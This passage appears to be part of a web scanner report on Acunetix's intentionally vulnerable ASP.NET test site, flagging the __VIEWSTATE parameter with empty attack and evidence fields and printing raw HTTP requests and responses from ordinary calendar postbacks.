align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1137 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,137 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8440&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgBAVpYwCtsIZGRk5XVrWaX4SBcm%2FWr9IW5%2BsJtPcXE%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKfj5HKBwLQp5LlBALTp%2BrACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna%2F1AgLmna%2F1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ%2FmBQLmnZ%2FmBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY%2FcDALmnY%2FcDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE%2FAvukoT8C%2B6TV0wkC%2B6TV0wkC%2B6TJ9gIC%2B6TJ9gIC%2B6T9jQoC%2B6T9jQoC%2B6SRoAMC%2B6SRoAMC%2B6SFxwwC%2B6SFxwwC%2B6T5rAkC%2B6T5rAkC%2B6TtwwIC%2B6TtwwIC3Mv%2F6AUC3Mv%2F6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7%2BQ8C3Mu7%2BQ8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6%2BoCAtzL6%2BoCAtzL39MPAtzL39MPAtzL8%2FYIAtzL8%2FYIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBdEK1qAoCPu86CBmxokdL7T2T12Y
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:13:15 GMT Content-Length: 12583
Response Body - size: 12,583 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgBAVpYwCtsIZGRk5XVrWaX4SBcm/Wr9IW5+sJtPcXE=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKfj5HKBwLQp5LlBALTp+rACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna/1AgLmna/1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ/mBQLmnZ/mBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY/cDALmnY/cDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE/AvukoT8C+6TV0wkC+6TV0wkC+6TJ9gIC+6TJ9gIC+6T9jQoC+6T9jQoC+6SRoAMC+6SRoAMC+6SFxwwC+6SFxwwC+6T5rAkC+6T5rAkC+6TtwwIC+6TtwwIC3Mv/6AUC3Mv/6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7+Q8C3Mu7+Q8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6+oCAtzL6+oCAtzL39MPAtzL39MPAtzL8/YIAtzL8/YIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBdEK1qAoCPu86CBmxokdL7T2T12Y" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">February 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8436')" style="color:Black" title="February 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8437')" style="color:Black" title="February 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8438')" style="color:Black" title="February 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8439')" style="color:Black" title="February 08">8</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8440')" style="color:White" title="February 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8441')" style="color:Black" title="February 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8442')" style="color:Black" title="February 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8443')" style="color:Black" title="February 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8444')" style="color:Black" title="February 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8445')" style="color:Black" title="February 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8446')" style="color:Black" title="February 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8447')" style="color:Black" title="February 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8448')" style="color:Black" title="February 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8449')" style="color:Black" title="February 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8450')" style="color:Black" title="February 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8451')" style="color:Black" title="February 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8452')" style="color:Black" title="February 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8453')" style="color:Black" title="February 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8454')" style="color:Black" title="February 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8455')" style="color:Black" title="February 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8456')" style="color:Black" title="February 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1141 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,141 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8439&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgCA7GtnCdsIZGRkT%2FuMrpjol%2FKmCseSSBxYmGwMvo0%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKIss%2BpDALQp5LlBALTp%2BrACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna%2F1AgLmna%2F1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ%2FmBQLmnZ%2FmBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY%2FcDALmnY%2FcDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE%2FAvukoT8C%2B6TV0wkC%2B6TV0wkC%2B6TJ9gIC%2B6TJ9gIC%2B6T9jQoC%2B6T9jQoC%2B6SRoAMC%2B6SRoAMC%2B6SFxwwC%2B6SFxwwC%2B6T5rAkC%2B6T5rAkC%2B6TtwwIC%2B6TtwwIC3Mv%2F6AUC3Mv%2F6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7%2BQ8C3Mu7%2BQ8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6%2BoCAtzL6%2BoCAtzL39MPAtzL39MPAtzL8%2FYIAtzL8%2FYIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBfHXACBnUkwjhsh2ku30%2B3etqcdY
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:10:19 GMT Content-Length: 12583
Response Body - size: 12,583 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgCA7GtnCdsIZGRkT/uMrpjol/KmCseSSBxYmGwMvo0=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKIss+pDALQp5LlBALTp+rACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna/1AgLmna/1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ/mBQLmnZ/mBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY/cDALmnY/cDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE/AvukoT8C+6TV0wkC+6TV0wkC+6TJ9gIC+6TJ9gIC+6T9jQoC+6T9jQoC+6SRoAMC+6SRoAMC+6SFxwwC+6SFxwwC+6T5rAkC+6T5rAkC+6TtwwIC+6TtwwIC3Mv/6AUC3Mv/6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7+Q8C3Mu7+Q8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6+oCAtzL6+oCAtzL39MPAtzL39MPAtzL8/YIAtzL8/YIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBfHXACBnUkwjhsh2ku30+3etqcdY" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">February 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8436')" style="color:Black" title="February 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8437')" style="color:Black" title="February 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8438')" style="color:Black" title="February 07">7</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8439')" style="color:White" title="February 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8440')" style="color:Black" title="February 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8441')" style="color:Black" title="February 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8442')" style="color:Black" title="February 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8443')" style="color:Black" title="February 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8444')" style="color:Black" title="February 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8445')" style="color:Black" title="February 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8446')" style="color:Black" title="February 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8447')" style="color:Black" title="February 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8448')" style="color:Black" title="February 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8449')" style="color:Black" title="February 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8450')" style="color:Black" title="February 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8451')" style="color:Black" title="February 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8452')" style="color:Black" title="February 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8453')" style="color:Black" title="February 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8454')" style="color:Black" title="February 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8455')" style="color:Black" title="February 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8456')" style="color:Black" title="February 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" 